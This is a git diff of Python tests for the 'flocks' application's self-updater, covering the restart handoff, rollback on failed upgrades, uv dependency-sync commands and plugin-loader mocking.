             with patch("pathlib.Path.home", return_value=tmp_path / "user_flocks"):
-                with patch("flocks.plugin.PluginLoader.load_all", side_effect=_fake_plugin_load):
+                with patch(
+                    "flocks.plugin.PluginLoader.load_extension",
+                    side_effect=lambda *_args, **_kwargs: _fake_plugin_load(),
+                ):
                     with patch(
                         "flocks.tool.tool_loader.discover_python_tool_sources",
                         return_value={"user_tool": user_tool_path},
@@ -981,7 +1010,7 @@ def test_load_plugin_tools_does_not_reclassify_builtin_name_collision(self, tmp_
             ToolRegistry._plugin_tool_names = []
             ToolRegistry._enabled_defaults = {}
 
-            with patch("flocks.plugin.PluginLoader.load_all", return_value=None):
+            with patch("flocks.plugin.PluginLoader.load_extension", return_value=None):
                 with patch(
                     "flocks.tool.tool_loader.discover_python_tool_sources",
                     return_value={"webfetch": colliding_tool_path},
@@ -1021,7 +1050,7 @@ def test_load_plugin_tools_reconciles_early_registered_python_plugin(self, tmp_p
             ToolRegistry._enabled_defaults = {}
 
             with patch("pathlib.Path.home", return_value=tmp_path / "user_flocks"):
-                with patch("flocks.plugin.PluginLoader.load_all", return_value=None):
+                with patch("flocks.plugin.PluginLoader.load_extension", return_value=None):
                     with patch(
                         "flocks.tool.tool_loader.discover_python_tool_sources",
                         return_value={"calculator": user_tool_path},
diff --git a/tests/updater/test_restart_handoff.py b/tests/updater/test_restart_handoff.py
new file mode 100644
index 000000000..6f9ceaab2
--- /dev/null
+++ b/tests/updater/test_restart_handoff.py
@@ -0,0 +1,175 @@
+from pathlib import Path
+from types import SimpleNamespace
+
+from flocks.updater import restart_handoff
+
+
+def _handoff_args(tmp_path: Path, restart_argv: list[str]) -> list[str]:
+    return [
+        "--parent-pid",
+        "1234",
+        "--backend-host",
+        "127.0.0.1",
+        "--backend-port",
+        "8000",
+        "--frontend-host",
+        "127.0.0.1",
+        "--frontend-port",
+        "5173",
+        "--backend-pid-file",
+        str(tmp_path / "backend.pid"),
+        "--install-root",
+        str(tmp_path),
+        "--uv-path",
+        "uv",
+        "--sync-timeout",
+        "300",
+        "--version",
+        "2026.4.1",
+        "--current-version",
+        "2026.3.31",
+        "--",
+        *restart_argv,
+    ]
+
+
+def test_run_waits_for_parent_and_backend_port_before_spawning(
+    monkeypatch,
+    tmp_path: Path,
+) -> None:
+    events: list[str] = []
+    restart_argv = ["python.exe", "-m", "flocks.cli.main", "serve", "--host", "127.0.0.1", "--port", "8000"]
+
+    monkeypatch.setattr(restart_handoff, "_record_handoff_log", lambda message: events.append(f"log:{message}"))
+    monkeypatch.setattr(
+        restart_handoff,
+        "_wait_for_parent_exit",
+        lambda parent_pid: events.append(f"wait-parent:{parent_pid}") or True,
+    )
+    monkeypatch.setattr(
+        restart_handoff,
+        "_ensure_backend_port_free",
+        lambda backend_port, backend_pid_file: events.append(f"free-port:{backend_port}:{backend_pid_file.name}") or True,
+    )
+    monkeypatch.setattr(
+        restart_handoff.subprocess,
+        "Popen",
+        lambda argv, cwd=None, close_fds=False: events.append(f"spawn:{list(argv)}:{cwd}:{close_fds}")
+        or SimpleNamespace(pid=4321),
+    )
+    monkeypatch.setattr(
+        restart_handoff,
+        "_record_backend_runtime_if_direct_serve",
+        lambda process, argv, **kwargs: events.append(f"record:{process.pid}:{list(argv)}:{kwargs['backend_port']}"),
+    )
+    monkeypatch.setattr(restart_handoff, "_run_upgrade_tasks", lambda args: events.append("tasks") or None)
+
+    code = restart_handoff.run(_handoff_args(tmp_path, restart_argv))
+
+    assert code == 0
+    assert events[1:] == [
+        "wait-parent:1234",
+        "free-port:8000:backend.pid",
+        "tasks",
+        f"spawn:{restart_argv}:{tmp_path}:True",
+        f"record:4321:{restart_argv}:8000",
+        "log:restart_spawned pid=4321",
+    ]
+
+
+def test_run_does_not_spawn_when_parent_exit_times_out(monkeypatch, tmp_path: Path) -> None:
+    events: list[str] = []
+
+    monkeypatch.setattr(restart_handoff, "_record_handoff_log", lambda message: events.append(f"log:{message}"))
+    monkeypatch.setattr(restart_handoff, "_wait_for_parent_exit", lambda parent_pid: False)
+    monkeypatch.setattr(
+        restart_handoff.subprocess,
+        "Popen",
+        lambda *_args, **_kwargs: events.append("spawn"),
+    )
+    monkeypatch.setattr(restart_handoff, "_run_upgrade_tasks", lambda args: events.append("tasks") or None)
+
+    code = restart_handoff.run(_handoff_args(tmp_path, ["python.exe", "-m", "flocks.cli.main", "serve"]))
+
+    assert code == 1
+    assert events == ["log:started parent_pid=1234 backend=127.0.0.1:8000 frontend=127.0.0.1:5173", "log:parent_exit_timeout parent_pid=1234"]
+
+
+def test_run_does_not_spawn_when_upgrade_tasks_fail(monkeypatch, tmp_path: Path) -> None:
+    events: list[str] = []
+    restart_argv = ["python.exe", "-m", "flocks.cli.main", "serve"]
+
+    monkeypatch.setattr(restart_handoff, "_record_handoff_log", lambda message: events.append(f"log:{message}"))
+    monkeypatch.setattr(restart_handoff, "_wait_for_parent_exit", lambda parent_pid: True)
+    monkeypatch.setattr(restart_handoff, "_ensure_backend_port_free", lambda backend_port, backend_pid_file: True)
+    monkeypatch.setattr(restart_handoff, "_run_upgrade_tasks", lambda args: "sync failed")
+    monkeypatch.setattr(restart_handoff, "_rollback_failed_upgrade", lambda args, error: events.append(f"rollback:{error}"))
+    monkeypatch.setattr(
+        restart_handoff.subprocess,
+        "Popen",
+        lambda *_args, **_kwargs: events.append("spawn"),
+    )
+
+    code = restart_handoff.run(_handoff_args(tmp_path, restart_argv))
+
+    assert code == 1
+    assert "rollback:sync failed" in events
+    assert "spawn" not in events
+
+
+def test_run_rolls_back_and_cleans_up_when_upgrade_tasks_crash(monkeypatch, tmp_path: Path) -> None:
+    events: list[str] = []
+    cleanup_dir = tmp_path / "cleanup"
+    cleanup_dir.mkdir()
+    restart_argv = ["python.exe", "-m", "flocks.cli.main", "serve"]
+
+    def crash(_args):
+        raise RuntimeError("boom")
+
+    args = _handoff_args(tmp_path, restart_argv)
+    separator_index = args.index("--")
+    args[separator_index:separator_index] = ["--cleanup-dir", str(cleanup_dir)]
+
+    monkeypatch.setattr(restart_handoff, "_record_handoff_log", lambda message: events.append(f"log:{message}"))
+    monkeypatch.setattr(restart_handoff, "_wait_for_parent_exit", lambda parent_pid: True)
+    monkeypatch.setattr(restart_handoff, "_ensure_backend_port_free", lambda backend_port, backend_pid_file: True)
+    monkeypatch.setattr(restart_handoff, "_run_upgrade_tasks", crash)
+    monkeypatch.setattr(restart_handoff, "_rollback_failed_upgrade", lambda args, error: events.append(f"rollback:{error}"))
+    monkeypatch.setattr(
+        restart_handoff.subprocess,
+        "Popen",
+        lambda *_args, **_kwargs: events.append("spawn"),
+    )
+
+    code = restart_handoff.run(args)
+
+    assert code == 1
+    assert "rollback:upgrade tasks crashed: boom" in events
+    assert not cleanup_dir.exists()
+    assert "spawn" not in events
+
+
+def test_ensure_backend_port_free_stops_backend_after_wait_timeout(monkeypatch, tmp_path: Path) -> None:
+    events: list[str] = []
+    wait_results = iter([False, True])
+    backend_pid_file = tmp_path / "backend.pid"
+
+    monkeypatch.setattr(restart_handoff, "_record_handoff_log", lambda message: events.append(f"log:{message}"))
+    monkeypatch.setattr(
+        restart_handoff,
+        "_wait_for_backend_port_free",
+        lambda port, **kwargs: events.append(f"wait:{port}:{kwargs.get('timeout_seconds')}") or next(wait_results),
+    )
+    monkeypatch.setattr(
+        restart_handoff.service_manager,
+        "stop_one",
+        lambda port, pid_file, name, console: events.append(f"stop:{port}:{pid_file.name}:{name}"),
+    )
+
+    assert restart_handoff._ensure_backend_port_free(8000, backend_pid_file) is True
+    assert events == [
+        "wait:8000:None",
+        "log:backend_port_still_in_use port=8000; stopping backend",
+        "stop:8000:backend.pid:backend",
+        "wait:8000:20.0",
+    ]
diff --git a/tests/updater/test_updater.py b/tests/updater/test_updater.py
index 51668f86e..056ddd7b1 100644
--- a/tests/updater/test_updater.py
+++ b/tests/updater/test_updater.py
@@ -1,6 +1,7 @@
 import os
 import shutil
 import subprocess
+import sys
 import tarfile
 import tomllib
 from os import utime
@@ -20,6 +21,24 @@ def _write_pyproject_version(pyproject_path: Path, version: str) -> None:
     )
 
 
+def _prepare_real_restart_runtime(install_root: Path) -> None:
+    for python_path in (
+        install_root / ".venv" / "bin" / "python",
+        install_root / ".venv" / "Scripts" / "python.exe",
+    ):
+        python_path.parent.mkdir(parents=True, exist_ok=True)
+        if python_path.exists() or python_path.is_symlink():
+            continue
+        symlinked = False
+        try:
+            python_path.symlink_to(sys.executable)
+            symlinked = True
+        except OSError:
+            shutil.copy2(sys.executable, python_path)
+    if not symlinked:
+        python_path.chmod(0o755)
+
+
 def test_run_handles_none_process_output(monkeypatch: pytest.MonkeyPatch, tmp_path: Path) -> None:
     def fake_run(*args, **kwargs):
         return subprocess.CompletedProcess(args=args[0], returncode=0, stdout=None, stderr=None)
@@ -54,6 +73,41 @@ def fake_run(*args, **kwargs):
     assert stderr == "failed�output"
 
 
+@pytest.mark.asyncio
+async def test_await_ignoring_cancellation_backs_off_on_repeated_cancellation(
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    shield_calls = 0
+    sleep_delays: list[float] = []
+
+    async def fake_shield(task):
+        nonlocal shield_calls
+        shield_calls += 1
+        if shield_calls <= 2:
+            raise updater.asyncio.CancelledError
+        return await task
+
+    async def fake_sleep(delay: float) -> None:
+        sleep_delays.append(delay)
+        if len(sleep_delays) == 1:
+            raise updater.asyncio.CancelledError
+
+    async def critical_step() -> str:
+        return "done"
+
+    monkeypatch.setattr(updater.asyncio, "shield", fake_shield)
+    monkeypatch.setattr(updater.asyncio, "sleep", fake_sleep)
+
+    result = await updater._await_ignoring_cancellation(critical_step())
+
+    assert result == "done"
+    assert shield_calls == 3
+    assert sleep_delays == [
+        updater._CANCELLATION_RETRY_DELAY_SECONDS,
+        updater._CANCELLATION_RETRY_DELAY_SECONDS,
+    ]
+
+
 def test_get_current_version_prefers_higher_marker_version(
     monkeypatch: pytest.MonkeyPatch,
     tmp_path: Path,
@@ -427,7 +481,7 @@ def test_build_uv_sync_env_returns_none_on_windows(
     assert updater._build_uv_sync_env() is None
 
 
-def test_build_dependency_sync_command_skips_project_install_on_windows(
+def test_build_dependency_sync_command_installs_project_on_windows(
     monkeypatch: pytest.MonkeyPatch,
 ) -> None:
     monkeypatch.setattr(updater.sys, "platform", "win32")
@@ -435,7 +489,8 @@ def test_build_dependency_sync_command_skips_project_install_on_windows(
     assert updater._build_dependency_sync_command("uv", uv_default_index="https://mirror.example/simple") == [
         "uv",
         "sync",
-        "--no-install-project",
+        "--frozen",
+        "--no-python-downloads",
         "--default-index",
         "https://mirror.example/simple",
     ]
@@ -446,7 +501,7 @@ def test_build_dependency_sync_command_keeps_project_install_on_non_windows(
 ) -> None:
     monkeypatch.setattr(updater.sys, "platform", "linux")
 
-    assert updater._build_dependency_sync_command("uv") == ["uv", "sync"]
+    assert updater._build_dependency_sync_command("uv") == ["uv", "sync", "--frozen", "--no-python-downloads"]
 
 
 def test_wheel_build_config_does_not_force_include_flockshub() -> None:
@@ -835,76 +890,18 @@ def fake_run(cmd: list[str], **kwargs) -> subprocess.CompletedProcess[str]:
 
 
 @pytest.mark.asyncio
-async def test_validate_windows_restart_runtime_requires_venv_python(tmp_path: Path) -> None:
-    assert await updater._validate_windows_restart_runtime(tmp_path) == (
-        f"Windows restart runtime is missing: {tmp_path / '.venv' / 'Scripts' / 'python.exe'}"
-    )
-
-
-@pytest.mark.asyncio
-async def test_validate_windows_restart_runtime_reports_import_failures(
+async def test_validate_restart_runtime_requires_venv_python(
     monkeypatch: pytest.MonkeyPatch,
     tmp_path: Path,
 ) -> None:
-    python_exe = tmp_path / ".venv" / "Scripts" / "python.exe"
-    python_exe.parent.mkdir(parents=True)
-    python_exe.write_text("", encoding="utf-8")
-
-    async def fake_run_async(cmd, cwd=None, timeout=None, env=None):
-        return 1, "", "No module named uvicorn"
-
-    monkeypatch.setattr(updater, "_run_async", fake_run_async)
-
-    result = await updater._validate_windows_restart_runtime(
-        tmp_path, max_attempts=1,
-    )
-    assert result == "Windows restart runtime validation failed: No module named uvicorn"
-
-
-@pytest.mark.asyncio
-async def test_validate_windows_restart_runtime_handles_timeout(
-    monkeypatch: pytest.MonkeyPatch,
-    tmp_path: Path,
-) -> None:
-    python_exe = tmp_path / ".venv" / "Scripts" / "python.exe"
-    python_exe.parent.mkdir(parents=True)
-    python_exe.write_text("", encoding="utf-8")
-
-    async def fake_run_async(cmd, cwd=None, timeout=None, env=None):
-        raise subprocess.TimeoutExpired(cmd, timeout or 60)
-
-    monkeypatch.setattr(updater, "_run_async", fake_run_async)
-
-    result = await updater._validate_windows_restart_runtime(
-        tmp_path, max_attempts=1, timeout=10,
-    )
-    assert result is not None
-    assert "timed out" in result.lower()
-
-
-@pytest.mark.asyncio
-async def test_validate_windows_restart_runtime_handles_generic_exception(
-    monkeypatch: pytest.MonkeyPatch,
-    tmp_path: Path,
-) -> None:
-    python_exe = tmp_path / ".venv" / "Scripts" / "python.exe"
-    python_exe.parent.mkdir(parents=True)
-    python_exe.write_text("", encoding="utf-8")
-
-    async def fake_run_async(cmd, cwd=None, timeout=None, env=None):
-        raise PermissionError("access denied")
-
-    monkeypatch.setattr(updater, "_run_async", fake_run_async)
-
-    result = await updater._validate_windows_restart_runtime(
-        tmp_path, max_attempts=1,
+    monkeypatch.setattr(updater.sys, "platform", "win32")
+    assert await updater._validate_restart_runtime(tmp_path) == (
+        f"Restart runtime is missing: {tmp_path / '.venv' / 'Scripts' / 'python.exe'}"
     )
-    assert result is not None
-    assert "access denied" in result
 
 
 @pytest.mark.asyncio
-async def test_validate_windows_restart_runtime_retries_and_succeeds(
+async def test_validate_restart_runtime_accepts_existing_venv_python_without_importing(
     monkeypatch: pytest.MonkeyPatch,
     tmp_path: Path,
 ) -> None:
@@ -912,22 +909,14 @@ async def test_validate_windows_restart_runtime_retries_and_succeeds(
     python_exe.parent.mkdir(parents=True)
     python_exe.write_text("", encoding="utf-8")
 
-    call_count = 0
+    async def fail_run_async(*_args, **_kwargs):
+        raise AssertionError("runtime validation should not import project modules")
 
-    async def fake_run_async(cmd, cwd=None, timeout=None, env=None):
-        nonlocal call_count
-        call_count += 1
-        if call_count == 1:
-            raise subprocess.TimeoutExpired(cmd, timeout or 60)
-        return 0, "", ""
+    monkeypatch.setattr(updater, "_run_async", fail_run_async)
 
-    monkeypatch.setattr(updater, "_run_async", fake_run_async)
+    monkeypatch.setattr(updater.sys, "platform", "win32")
 
-    result = await updater._validate_windows_restart_runtime(
-        tmp_path, max_attempts=2, retry_delay=0.0,
-    )
-    assert result is None
-    assert call_count == 2
+    assert await updater._validate_restart_runtime(tmp_path) is None
 
 
 def test_rmtree_onerror_retries_before_logging_skip(monkeypatch: pytest.MonkeyPatch) -> None:
@@ -950,6 +939,17 @@ def fake_remove(path: str) -> None:
     assert warnings == [("updater.rmtree.skip_locked", {"path": "/tmp/locked"})]
 
 
+def test_cleanup_replaced_files_removes_renamed_lock_leftovers(tmp_path: Path) -> None:
+    install_root = tmp_path / "install"
+    leftover = install_root / "webui.flocks_old_123"
+    leftover.mkdir(parents=True)
+    (leftover / "old.txt").write_text("old", encoding="utf-8")
+
+    updater.cleanup_replaced_files(install_root)
+
+    assert not leftover.exists()
+
+
 def test_safe_remove_renames_locked_file_on_windows(monkeypatch: pytest.MonkeyPatch, tmp_path: Path) -> None:
     target = tmp_path / "locked.exe"
     target.write_text("old", encoding="utf-8")
@@ -1513,7 +1513,7 @@ def test_replace_install_dir_copies_dot_flocks_plugins_from_source(
 
 
 @pytest.mark.asyncio
-async def test_perform_update_builds_current_frontend_after_handover(
+async def test_perform_update_schedules_handoff_after_handover(
     monkeypatch: pytest.MonkeyPatch,
     tmp_path: Path,
 ) -> None:
@@ -1527,8 +1527,11 @@ async def test_perform_update_builds_current_frontend_after_handover(
     (staged_webui / "dist" / "index.html").write_text("<html></html>", encoding="utf-8")
     install_root = tmp_path / "install-root"
     install_root.mkdir()
+    _prepare_real_restart_runtime(install_root)
 
     events: list[str] = []
+    popen_calls: list[list[str]] = []
+
     async def fake_get_updater_config():
         return SimpleNamespace(
             archive_format="zip",
@@ -1541,15 +1544,6 @@ async def fake_get_updater_config():
             gitee_repo=None,
         )
 
-    async def fake_run_async(cmd, cwd=None, timeout=None, env=None):
-        if cmd[1] == "install":
-            events.append("npm-install")
-        elif cmd[:3] == ["/usr/bin/npm", "run", "build"]:
-            events.append("npm-build")
-        else:
-            events.append("uv-sync")
-        return 0, "", ""
-
     async def fake_download_with_fallback(**_kwargs):
         return archive_path
 
@@ -1566,7 +1560,6 @@ async def fake_sleep(_seconds) -> None:
     monkeypatch.setattr(updater, "_download_with_fallback", fake_download_with_fallback)
     monkeypatch.setattr(updater, "_backup_current_version", lambda *_args, **_kwargs: tmp_path / "backup.tar.gz")
     monkeypatch.setattr(updater, "_extract_archive", lambda *_args, **_kwargs: staged_root)
-    monkeypatch.setattr(updater, "_run_async", fake_run_async)
     monkeypatch.setattr(
         updater,
         "_find_executable",
@@ -1579,27 +1572,30 @@ async def fake_sleep(_seconds) -> None:
         lambda *_args, **_kwargs: events.append("replace")
         or shutil.copytree(staged_webui, install_root / "webui", dirs_exist_ok=True),
     )
-    monkeypatch.setattr(updater, "_write_version_marker", lambda version: events.append(f"marker:{version}"))
-    monkeypatch.setattr(updater, "_refresh_global_cli_entry", lambda _root: None)
     monkeypatch.setattr(updater, "_build_restart_argv", lambda install_root=None: ["/usr/bin/python3", "-m", "flocks.cli.main", "start"])
     monkeypatch.setattr(updater.asyncio, "sleep", fake_sleep)
     monkeypatch.setattr(updater, "_rollback_failed_update", lambda *_args: events.append("rollback"))
     monkeypatch.setattr(updater, "rollback_upgrade_handover", lambda *_args: events.append("rollback_handover"))
-    monkeypatch.setattr(updater.os, "execv", lambda *_args: (_ for _ in ()).throw(OSError("boom")))
+    monkeypatch.setattr(updater.subprocess, "Popen", lambda argv, **_kwargs: popen_calls.append(list(argv)) or SimpleNamespace(pid=4321))
+    monkeypatch.setattr(updater.os, "_exit", lambda code: (_ for _ in ()).throw(SystemExit(code)))
 
-    progresses = []
-    async for step in updater.perform_update("2026.4.1"):
-        progresses.append(step)
+    with pytest.raises(SystemExit, match="0"):
+        async for _step in updater.perform_update("2026.4.1"):
+            pass
 
-    assert progresses[-1].stage == "error"
-    assert "Failed to restart service" in progresses[-1].message
-    assert events[:2] == ["replace", "uv-sync"]
-    assert "marker:2026.4.1" in events
+    assert events[:2] == ["replace", "sleep"]
     assert "handover" in events
-    assert events.index("handover") > events.index("uv-sync")
-    assert events.index("npm-install") > events.index("handover")
-    assert events.index("npm-build") > events.index("npm-install")
-    assert "rollback_handover" in events
+    assert len(popen_calls) == 1
+    handoff_argv = popen_calls[0]
+    assert handoff_argv[:3] == ["/usr/bin/python3", "-m", "flocks.updater.restart_handoff"]
+    assert "--uv-path" in handoff_argv
+    assert "--version" in handoff_argv
+    assert handoff_argv[handoff_argv.index("--") + 1 :] == [
+        "/usr/bin/python3",
+        "-m",
+        "flocks.cli.main",
+        "start",
+    ]
 
 
 @pytest.mark.asyncio
@@ -1680,7 +1676,7 @@ async def fake_sleep(_seconds) -> None:
 
     assert progresses[-1].stage == "error"
     assert progresses[-1].message == "Failed to prepare WebUI handover: handover boom"
-    assert events == ["replace", "uv-sync", "marker:2026.4.1", "restore"]
+    assert events == ["replace", "restore"]
 
 
 @pytest.mark.asyncio
@@ -1691,6 +1687,8 @@ async def test_perform_update_uses_cn_mirror_profile_for_sources_and_dependency_
     archive_path = tmp_path / "flocks.tar.gz"
     archive_path.write_text("archive", encoding="utf-8")
     staged_root = tmp_path / "staged"
+    install_root = tmp_path / "install-root"
+    _prepare_real_restart_runtime(install_root)
     staged_webui = staged_root / "webui"
     staged_webui.mkdir(parents=True)
     (staged_webui / "package.json").write_text("{}", encoding="utf-8")
@@ -1722,7 +1720,7 @@ async def fake_run_async(cmd, cwd=None, timeout=None, env=None):
         return 0, "", ""
 
     monkeypatch.setattr(updater, "_get_updater_config", fake_get_updater_config)
-    monkeypatch.setattr(updater, "_get_repo_root", lambda: tmp_path / "install-root")
+    monkeypatch.setattr(updater, "_get_repo_root", lambda: install_root)
     monkeypatch.setattr(updater, "get_current_version", lambda: "2026.3.31")
     monkeypatch.setattr(updater, "_download_with_fallback", fake_download_with_fallback)
     monkeypatch.setattr(updater, "_backup_current_version", lambda *_args, **_kwargs: tmp_path / "backup.tar.gz")
@@ -1750,7 +1748,14 @@ async def fake_run_async(cmd, cwd=None, timeout=None, env=None):
     assert captured["sources"] == ["gitee", "github"]
     assert run_calls == [
         (
-            ["/usr/bin/uv", "sync", "--default-index", "https://mirrors.aliyun.com/pypi/simple"],
+            [
+                "/usr/bin/uv",
+                "sync",
+                "--frozen",
+                "--no-python-downloads",
+                "--default-index",
+                "https://mirrors.aliyun.com/pypi/simple",
+            ],
             None,
         ),
     ]
@@ -1764,6 +1769,8 @@ async def test_perform_update_retries_cn_uv_sync_with_default_source(
     archive_path = tmp_path / "flocks.tar.gz"
     archive_path.write_text("archive", encoding="utf-8")
     staged_root = tmp_path / "staged"
+    install_root = tmp_path / "install-root"
+    _prepare_real_restart_runtime(install_root)
 
     run_calls: list[list[str]] = []
 
@@ -1781,7 +1788,14 @@ async def fake_get_updater_config():
 
     async def fake_run_async(cmd, cwd=None, timeout=None, env=None):
         run_calls.append(list(cmd))
-        if cmd == ["/usr/bin/uv", "sync", "--default-index", "https://mirrors.aliyun.com/pypi/simple"]:
+        if cmd == [
+            "/usr/bin/uv",
+            "sync",
+            "--frozen",
+            "--no-python-downloads",
+            "--default-index",
+            "https://mirrors.aliyun.com/pypi/simple",
+        ]:
             return 1, "", "403 Forbidden"
         return 0, "", ""
 
@@ -1792,7 +1806,7 @@ async def fake_sleep(_seconds) -> None:
         pass
 
     monkeypatch.setattr(updater, "_get_updater_config", fake_get_updater_config)
-    monkeypatch.setattr(updater, "_get_repo_root", lambda: tmp_path / "install-root")
+    monkeypatch.setattr(updater, "_get_repo_root", lambda: install_root)
     monkeypatch.setattr(updater, "get_current_version", lambda: "2026.3.31")
     monkeypatch.setattr(updater, "_download_with_fallback", fake_download_with_fallback)
     monkeypatch.setattr(updater, "_backup_current_version", lambda *_args, **_kwargs: tmp_path / "backup.tar.gz")
@@ -1808,8 +1822,15 @@ async def fake_sleep(_seconds) -> None:
 
     assert progresses[-1].stage == "done"
     assert run_calls == [
-        ["/usr/bin/uv", "sync", "--default-index", "https://mirrors.aliyun.com/pypi/simple"],
-        ["/usr/bin/uv", "sync"],
+        [
+            "/usr/bin/uv",
+            "sync",
+            "--frozen",
+            "--no-python-downloads",
+            "--default-index",
+            "https://mirrors.aliyun.com/pypi/simple",
+        ],
+        ["/usr/bin/uv", "sync", "--frozen", "--no-python-downloads"],
     ]
 
 
@@ -1828,6 +1849,7 @@ async def test_perform_update_prefers_bundled_npm_for_windows_frontend_rebuild(
     (staged_webui / "dist" / "index.html").write_text("<html></html>", encoding="utf-8")
     install_root = tmp_path / "install-root"
     install_root.mkdir()
+    _prepare_real_restart_runtime(install_root)
 
     node_home = tmp_path / "tools" / "node"
     node_home.mkdir(parents=True)
@@ -1856,9 +1878,6 @@ async def fake_run_async(cmd, cwd=None, timeout=None, env=None):
         run_calls.append((list(cmd), env))
         return 0, "", ""
 
-    async def fake_validate_windows_restart_runtime(*_args, **_kwargs):
-        return None
-
     monkeypatch.setattr(updater, "_get_updater_config", fake_get_updater_config)
     monkeypatch.setattr(updater, "_get_repo_root", lambda: install_root)
     monkeypatch.setattr(updater, "get_current_version", lambda: "2026.3.31")
@@ -1868,7 +1887,6 @@ async def fake_validate_windows_restart_runtime(*_args, **_kwargs):
     monkeypatch.setattr(updater, "_run_async", fake_run_async)
     monkeypatch.setattr(updater, "_find_executable", lambda name: r"C:\Users\flocks\AppData\Local\Programs\Flocks\tools\uv\uv.exe" if name == "uv" else None)
     monkeypatch.setattr(updater, "_build_uv_sync_env", lambda: None)
-    monkeypatch.setattr(updater, "_validate_windows_restart_runtime", fake_validate_windows_restart_runtime)
     monkeypatch.setattr(
         updater,
         "_replace_install_dir",
@@ -1876,17 +1894,13 @@ async def fake_validate_windows_restart_runtime(*_args, **_kwargs):
     )
     monkeypatch.setattr(updater, "_write_version_marker", lambda _v: None)
     monkeypatch.setattr(updater.sys, "platform", "win32")
-    monkeypatch.setattr(updater, "_prepare_upgrade_handover", lambda _version: None)
-    monkeypatch.setattr(updater, "_build_restart_argv", lambda install_root=None: [r"C:\tool\python.exe", "-m", "flocks.cli.main", "start"])
-    monkeypatch.setattr(updater.subprocess, "Popen", lambda *_args, **_kwargs: SimpleNamespace(pid=4321))
-    monkeypatch.setattr(updater.os, "_exit", lambda code: (_ for _ in ()).throw(SystemExit(code)))
     monkeypatch.setenv("FLOCKS_NODE_HOME", str(node_home))
     monkeypatch.delenv("FLOCKS_INSTALL_ROOT", raising=False)
     monkeypatch.setenv("PATH", "/usr/bin:/bin")
 
-    with pytest.raises(SystemExit, match="0"):
-        async for _step in updater.perform_update("2026.4.1", locale="zh-CN"):
-            pass
+    progresses = [step async for step in updater.perform_update("2026.4.1", restart=False, locale="zh-CN")]
+
+    assert progresses[-1].stage == "done"
     frontend_calls = [
         call for call in run_calls if call[0][0] == str(bundled_npm)
     ]
@@ -1917,6 +1931,7 @@ async def test_perform_update_retries_windows_frontend_with_system_npm_after_bun
     (staged_webui / "package.json").write_text("{}", encoding="utf-8")
     install_root = tmp_path / "install-root"
     install_root.mkdir()
+    _prepare_real_restart_runtime(install_root)
     install_webui = install_root / "webui"
 
     node_home = tmp_path / "tools" / "node"
@@ -1968,9 +1983,6 @@ async def fake_run_async(cmd, cwd=None, timeout=None, env=None):
             return 0, "", ""
         raise AssertionError(f"unexpected command: {cmd}")
 
-    async def fake_validate_windows_restart_runtime(*_args, **_kwargs):
-        return None
-
     def fake_find(name: str) -> str | None:
         if name == "npm.cmd":
             return system_npm
@@ -1987,7 +1999,6 @@ def fake_find(name: str) -> str | None:
     monkeypatch.setattr(updater, "_run_async", fake_run_async)
     monkeypatch.setattr(updater, "_find_executable", fake_find)
     monkeypatch.setattr(updater, "_build_uv_sync_env", lambda: None)
-    monkeypatch.setattr(updater, "_validate_windows_restart_runtime", fake_validate_windows_restart_runtime)
     monkeypatch.setattr(
         updater,
         "_replace_install_dir",
@@ -1995,17 +2006,13 @@ def fake_find(name: str) -> str | None:
     )
     monkeypatch.setattr(updater, "_write_version_marker", lambda _v: None)
     monkeypatch.setattr(updater.sys, "platform", "win32")
-    monkeypatch.setattr(updater, "_prepare_upgrade_handover", lambda _version: None)
-    monkeypatch.setattr(updater, "_build_restart_argv", lambda install_root=None: [r"C:\tool\python.exe", "-m", "flocks.cli.main", "start"])
-    monkeypatch.setattr(updater.subprocess, "Popen", lambda *_args, **_kwargs: SimpleNamespace(pid=4321))
-    monkeypatch.setattr(updater.os, "_exit", lambda code: (_ for _ in ()).throw(SystemExit(code)))
     monkeypatch.setenv("FLOCKS_NODE_HOME", str(node_home))
     monkeypatch.delenv("FLOCKS_INSTALL_ROOT", raising=False)
     monkeypatch.setenv("PATH", "/usr/bin:/bin")
 
-    with pytest.raises(SystemExit, match="0"):
-        async for _step in updater.perform_update("2026.4.1", locale="zh-CN"):
-            pass
+    progresses = [step async for step in updater.perform_update("2026.4.1", restart=False, locale="zh-CN")]
+
+    assert progresses[-1].stage == "done"
     frontend_calls = [
         call for call in run_calls if call[0][0] in {str(bundled_npm), system_npm}
     ]
@@ -2116,6 +2123,7 @@ async def test_perform_update_retries_windows_frontend_with_full_timeout_after_b
     (staged_webui / "package-lock.json").write_text("{}", encoding="utf-8")
     install_root = tmp_path / "install-root"
     install_root.mkdir()
+    _prepare_real_restart_runtime(install_root)
     install_webui = install_root / "webui"
 
     node_home = tmp_path / "tools" / "node"
@@ -2165,9 +2173,6 @@ async def fake_run_async(cmd, cwd=None, timeout=None, env=None):
             return 0, "", ""
         raise AssertionError(f"unexpected command: {cmd}")
 
-    async def fake_validate_windows_restart_runtime(*_args, **_kwargs):
-        return None
-
     def fake_find(name: str) -> str | None:
         if name == "npm.cmd":
             return system_npm
@@ -2184,7 +2189,6 @@ def fake_find(name: str) -> str | None:
     monkeypatch.setattr(updater, "_run_async", fake_run_async)
     monkeypatch.setattr(updater, "_find_executable", fake_find)
     monkeypatch.setattr(updater, "_build_uv_sync_env", lambda: None)
-    monkeypatch.setattr(updater, "_validate_windows_restart_runtime", fake_validate_windows_restart_runtime)
     monkeypatch.setattr(
         updater,
         "_replace_install_dir",
@@ -2192,17 +2196,13 @@ def fake_find(name: str) -> str | None:
     )
     monkeypatch.setattr(updater, "_write_version_marker", lambda _v: None)
     monkeypatch.setattr(updater.sys, "platform", "win32")
-    monkeypatch.setattr(updater, "_prepare_upgrade_handover", lambda _version: None)
-    monkeypatch.setattr(updater, "_build_restart_argv", lambda install_root=None: [r"C:\tool\python.exe", "-m", "flocks.cli.main", "start"])
-    monkeypatch.setattr(updater.subprocess, "Popen", lambda *_args, **_kwargs: SimpleNamespace(pid=4321))
-    monkeypatch.setattr(updater.os, "_exit", lambda code: (_ for _ in ()).throw(SystemExit(code)))
     monkeypatch.setenv("FLOCKS_NODE_HOME", str(node_home))
     monkeypatch.delenv("FLOCKS_INSTALL_ROOT", raising=False)
     monkeypatch.setenv("PATH", "/usr/bin:/bin")
 
-    with pytest.raises(SystemExit, match="0"):
-        async for _step in updater.perform_update("2026.4.1", locale="zh-CN"):
-            pass
+    progresses = [step async for step in updater.perform_update("2026.4.1", restart=False, locale="zh-CN")]
+
+    assert progresses[-1].stage == "done"
     frontend_calls = [
         call for call in run_calls if call[0][0] in {str(bundled_npm), system_npm}
     ]
